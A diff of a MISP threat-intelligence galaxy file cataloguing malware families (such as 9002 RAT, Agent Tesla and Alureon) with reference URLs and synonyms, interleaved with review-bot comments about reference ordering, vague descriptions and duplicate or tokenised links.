], + "synonyms": [], + "type": [] + }, + "uuid": "823f4eb9-ad37-4fab-8e69-3bdae47a0028", + "value": "4h_rat" + }, { "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the 
Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"", "meta": { 
@@ -3693,21 +7569,60 @@ "value": "7ev3n" }, { - "description": "", + "description": "8T_Dropper has been used by Chinese threat actor TA428 in order to install Cotx RAT onto victim's machines during Operation LagTime IT. According to Proofpoint the attack was developed against a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. The dropper was delivered through an RTF document exploiting CVE-2018-0798.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper", + "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/", + "https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a?", + "https://tradahacking.vn/another-malicious-document-with-cve-2017-11882-839e9c0bbf2f", + "https://nao-sec.org/2021/01/royal-road-redive.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf", + "https://blog.malwarelab.pl/posts/on_the_royal_road/", + "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://community.riskiq.com/article/56fa1b2f", + "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746", + "https://securelist.com/cycldek-bridging-the-air-gap/97157/", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-attribution-object-using-rtf-object-dimensions-track-apt-phishing-weaponizers/", + "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", + "https://tradahacking.vn/l%C3%A0-1937cn-hay-oceanlotus-hay-lazarus-6ca15fe1b241", + "https://community.riskiq.com/article/5fe2da7f" + ], + 
"synonyms": [ + "8t_dropper", + "RoyalRoad" + ], + "type": [] + }, + "uuid": "df755d5f-db11-417d-8fed-b7abdc826590", + "value": "8.t Dropper" + }, + { + "description": "9002 RAT is a Remote Access Tool typically observed to be used by an APT to control a victim's machine. It has been spread over via zero day exploits (e.g. targeting Internet Explorer) as well as via email attachments. The infection chain starts by opening a .LNK (an OLE packager shell object) that executes a Powershell command.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002", - "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "https://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/6894315", - "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/", - "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf", "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", + "https://www.infopoint-security.de/medien/the-elderwood-project.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-express", + "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", + 
"https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html", + "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/elderwood-project-12-en.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/" ], "synonyms": [ + "HOMEUNIX", "Hydraq", "McRAT" ], 
@@ -3716,17 +7631,34 @@ "uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f", "value": "9002 RAT" }, + { + "description": "Uses Discord as C&C, has ransomware feature.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon", + "https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "97be2d1a-878d-46bd-8ee7-d8798ec61ef1", + "value": "Abaddon" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos", + "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/", "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", - "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/", - "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software" + "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://www.carbonblack.com/2020/05/21/tau-technical-report-new-attack-combines-tinypos-with-living-off-the-land-techniques-for-scraping-credit-card-data/", + "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/" ], "synonyms": [ - "PinkKite" + "PinkKite", + "TinyPOS" ], "type": [] }, @@ -3737,8 +7669,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.abantes", - "https://github.com/ElektroKill/AbantesTrojan" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.abantes" ], "synonyms": [], "type": [] 
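Review bot: Reorder noise hides the substantive changes in the 9002 RAT `refs`: the FireEye ephemeral-hydra post, the Unit 42 Google Drive post and the Sunshop post are removed and re-added at new positions, so the real additions (the Secureworks BRONZE profiles, the Elderwood papers, the `HOMEUNIX` synonym) are hard to pick out. Since this file is regenerated from the Malpedia API, the generator should sort each `refs` array before serializing so a re-import yields a minimal, reviewable diff. `https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn` is an untitled file-share link that can be revoked or swapped at any time; keep it only if no citable original exists. The 8.t Dropper ref `https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a?` should have its empty trailing `?` stripped so it deduplicates against the canonical URL.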
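Review bot: The new `Abaddon` entry lands directly above the existing `AbaddonPOS` entry, and its description `Uses Discord as C&C, has ransomware feature.` never says what kind of malware it is, so the two separately-identified families are easy to conflate in the galaxy picker. The cited BleepingComputer piece calls it a RAT; suggest `"description": "Remote access trojan that receives its commands via Discord and carries a ransomware feature; distinct from the AbaddonPOS entry."`. Same hunk: `TinyPOS` is added as an AbaddonPOS synonym on the strength of the Carbon Black and norfolkinfosec refs — if those sources treat TinyPOS as a separate family rather than an alias, it belongs in its own entry, since synonyms drive tag matching.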
@@ -3758,6 +7689,67 @@ "uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83", "value": "Abbath Banker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.absentloader", + "https://github.com/Tlgyt/AbSent-Loader", + "https://twitter.com/cocaman/status/1260069549069733888" + ], + "synonyms": [], + "type": [] + }, + "uuid": "532d67fc-0c93-4345-80c4-0c1657056d5e", + "value": "AbSent Loader" + }, + { + "description": "A Linux backdoor that was apparently ported to Windows. This entry represents the Windows version. It appears the Linux version was written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.acbackdoor", + "https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9aa1a516-bd88-4038-a37d-cf66c607e68c", + "value": "ACBackdoor (Windows)" + }, + { + "description": "ACEHASH is described by FireEye as combined credential harvester that consists of two components, a loader and encrypted/compressed payload. To execute, a password is necessary (e.g. 
9839D7F1A0) and the individual modules are addressed with parameters (-m, -w, -h).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash", + "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas" + ], + "synonyms": [], + "type": [] + }, + "uuid": "51f8c94a-572f-450b-a52f-d3da96302d6b", + "value": "ACEHASH" + }, + { + "description": "Unit42 found AcidBox in February 2019 and describes it as a malware family used by an unknown threat actor in 2017 against Russian entities, as stated by Dr.Web. It reused and improved an exploit for VirtualBox previously used by Turla. The malware itself is a modular toolkit, featuring both usermode and kernelmode components and anti-analysis techniques such as stack-based string obfuscation or dynamic XOR-encoded API usage.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.epicturla.com/blog/acidbox-clustering", + "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html", + "https://unit42.paloaltonetworks.com/acidbox-rare-malware/" + ], + "synonyms": [ + "MagicScroll" + ], + "type": [] + }, + "uuid": "4ccc1ec4-6008-4788-95d9-248749f5a7fe", + "value": "AcidBox" + }, { "description": "AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more.", "meta": { 
@@ -3775,8 +7767,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym", - "https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym" ], "synonyms": [], "type": [] @@ -3785,7 +7776,20 @@ "value": "Acronym" }, { - "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.adamantium_thief", + "https://github.com/LimerBoy/Adamantium-Thief" + ], + "synonyms": [], + "type": [] + }, + "uuid": "28e01527-dbb5-4331-b5bf-5658ebf58297", + "value": "Adamantium Thief" + }, + { + "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", @@ -3798,6 +7802,19 @@ "uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1", "value": "AdamLocker" }, + { + "description": "Some Ransomware distributed by TA547 in Australia", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.adhubllka", + "https://www.proofpoint.com/us/blog/security-briefs/ta547-pivots-ursnif-banking-trojan-ransomware-australian-campaign" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ebf31d45-922a-42ad-b326-8a72ba6dead7", + "value": "Adhubllka" + }, { "description": "", "meta": { 
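Review bot: The `Acronym` entry is left with only its own Malpedia page as a reference once `https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/` is removed, so consumers of the cluster no longer have an independent source for the family. If the link was pruned upstream because the Arbor blog moved, an archived copy preserves the citation better than deletion; the Abantes GitHub link in the previous hunk is dropped the same way. Because this file is rebuilt wholesale from the API, a post-processing check that warns when a re-import removes the last external ref of an existing `uuid` would catch this class of silent loss.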
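Review bot: The Adhubllka description `Some Ransomware distributed by TA547 in Australia` is too vague to help an analyst and its casing is off; it is shown verbatim in the MISP UI. The Proofpoint brief it cites covers TA547 moving from Ursnif distribution to ransomware in an Australian campaign, so `"description": "Ransomware family observed being distributed by TA547 in an Australian campaign, following the group's earlier Ursnif distribution."` says the same thing precisely.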
@@ -3816,7 +7833,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot", - "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot" + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot", + "https://www.bromium.com/second-stage-attack-analysis/" ], "synonyms": [], "type": [] @@ -3837,6 +7855,21 @@ "uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58", "value": "Adylkuzz" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.afrodita", + "https://twitter.com/_CPResearch_/status/1201957880909484033", + "https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html", + "https://github.com/albertzsigovits/malware-notes/blob/master/Afrodita.md" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4c9f8ad2-ace4-42e5-ab70-efdfaad4d1bd", + "value": "Afrodita" + }, { "description": "", "meta": { 
@@ -3845,13 +7878,26 @@ "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/", "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", + "https://unit42.paloaltonetworks.com/ironnetinjector/", "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html", + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4", + "https://www.secureworks.com/research/threat-profiles/iron-hunter", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a", + "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf", "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat" ], "synonyms": [ "ComRAT", + "Minit", "Sun rootkit" ], "type": [] 
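Review bot: The Agent.BTZ `refs` now carry two Symantec Waterbug whitepaper URLs — the existing `.../security_response/whitepapers/waterbug-attack-group.pdf` and the added `.../white-papers/waterbug-attack-group-16-en.pdf` — which look like the same document on the old and new Symantec hosts; if so, keep one canonical URL so the list does not accumulate host migrations. The added synonym `Minit` is not obviously named by any of the listed refs, so the source that uses that name should be cited alongside it. Both points are hedged on the content of the linked documents, which the diff does not show.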
@@ -3864,22 +7910,94 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", - "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", - "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", - "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/", + "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", + "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/", + "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", - "https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting" + "https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4", + "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/", + "https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/", + "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", + "https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/", + "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", + "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", + 
"https://isc.sans.edu/diary/27088", + "https://www.secureworks.com/research/threat-profiles/gold-galleon", + "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/", + "https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/", + "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/", + "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", + "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", + "https://www.telsy.com/wp-content/uploads/ATR_82599-1.pdf", + "https://blog.morphisec.com/agent-tesla-a-day-in-a-life-of-ir", + "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", + "https://blog.minerva-labs.com/preventing-agenttesla", + "https://blog.malwarebytes.com/cybercrime/2020/04/new-agenttesla-variant-steals-wifi-credentials/", + "https://lab52.io/blog/a-twisted-malware-infection-chain/", + "https://malwatch.github.io/posts/agent-tesla-malware-analysis/", + "https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://isc.sans.edu/diary/rss/27092", + "https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", + "https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf", + 
"https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://blog.malwarelab.pl/posts/basfu_aggah/", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/" + ], + "synonyms": [ + "AgenTesla", + "AgentTesla", + "Negasteal" ], - "synonyms": [], "type": [] }, "uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380", "value": "Agent Tesla" }, { - "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. 
Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", + "description": "The agfSpy backdoor retrieves configuration and commands from its C&C server. These commands allow the backdoor to execute shell commands and send the execution results back to the server. It also enumerates directories and can list, upload, download, and execute files, among other functions. The capabilities of agfSpy are very similar to dneSpy, except each backdoor uses a different C&C server and various formats in message exchanges.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.agfspy", + "https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "405fe149-1454-4e8c-a4a3-d56e0c5f62d7", + "value": "AgfSpy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas", + "https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/" + ], + "synonyms": [ + "BlueTraveller" + ], + "type": [] + }, + "uuid": "dff7e10c-41ca-481d-8003-73169803272d", + "value": "Albaniiutas" + }, + { + "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. 
It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", @@ -3891,14 +8009,28 @@ "uuid": "43ec8adc-0658-4765-be20-f22679097fab", "value": "Aldibot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alfonso_stealer", + "https://twitter.com/3xp0rtblog/status/1344352253294104576" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a76874b3-12d0-4dec-9813-01819e6b6d49", + "value": "Alfonso Stealer" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm", "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/", - "https://www.s21sec.com/en/blog/2017/01/alice-simplicity-for-atm-jackpotting/", - "https://www.symantec.com/security-center/writeup/2016-122104-0203-99" + "https://www.symantec.com/security-center/writeup/2016-122104-0203-99", + "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [ "AliceATM", 
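Review bot: `https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4` embeds a Medium friend-link token (`sk=`) that is bound to the author's account and bypasses the paywall; a shared threat-intel cluster should cite the canonical `https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996` so the token is not redistributed and the ref does not break when it is revoked. The same hunk re-emits refs that were already present (the Unit 42 packing analysis, malwarebreakdown, Zscaler, Fortinet) at new positions, which is reorder noise that sorting `refs` in the generator would remove. The new synonym `AgenTesla` reads as a typo variant rather than a name used in the cited sources; if it is kept deliberately as a misspelling alias, that intent should be recorded in the generator, since the JSON itself cannot carry a comment.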
@@ -3914,8 +8046,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos", + "https://blog.centurylink.com/alina-point-of-sale-malware-still-lurking-in-dns/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", "http://www.xylibox.com/2013/02/alina-34-pos-malware.html", - "https://www.nuix.com/blog/alina-continues-spread-its-wings", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/", "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/", @@ -3932,6 +8065,21 @@ "uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70", "value": "Alina POS" }, + { + "description": "AllaKore is a simple Remote Access Tool written in Delphi, first observed in 2015 but still in early stages of development. It implements the RFB protocol which uses frame buffers and thus is able to send back only the changes of screen frames to the controller, speeding up the transport and visualization control.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.allakore", + "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf", + "https://twitter.com/_re_fox/status/1212070711206064131", + "https://github.com/Anderson-D/AllaKore" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fb1c6035-42ee-403c-a2ae-a53f7ab2de00", + "value": "AllaKore" + }, { "description": "", "meta": { 
@@ -3948,6 +8096,19 @@ "uuid": "6aabb492-e282-40fb-a840-fe4e643ec094", "value": "Allaple" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.almanahe", + "https://www.elastic.co/de/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + ], + "synonyms": [], + "type": [] + }, + "uuid": "352f79b1-6862-4164-afa3-a1d787c40ec1", + "value": "Almanahe" + }, { "description": "", "meta": { @@ -4018,7 +8179,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://www.secureworks.com/research/threat-profiles/nickel-gladstone" ], "synonyms": [], "type": [] @@ -4046,13 +8208,17 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html", - "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html" + "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html", + "https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/", + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj64_wowlik.vt", + "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/" ], "synonyms": [ "Olmarik", "Pihar", "TDL", - "TDSS" + "TDSS", + "wowlik" ], "type": [] }, 
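Review bot: The added Alureon synonym `wowlik` is lowercase while its siblings are capitalized (`Olmarik`, `Pihar`, `TDL`, `TDSS`); the Trend Micro writeup added in the same hunk spells the detection `TROJ64_WOWLIK.VT`, so `"Wowlik"` would match both the file's convention and the source. Tooling that matches galaxy synonyms exactly will otherwise miss the capitalized spelling.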
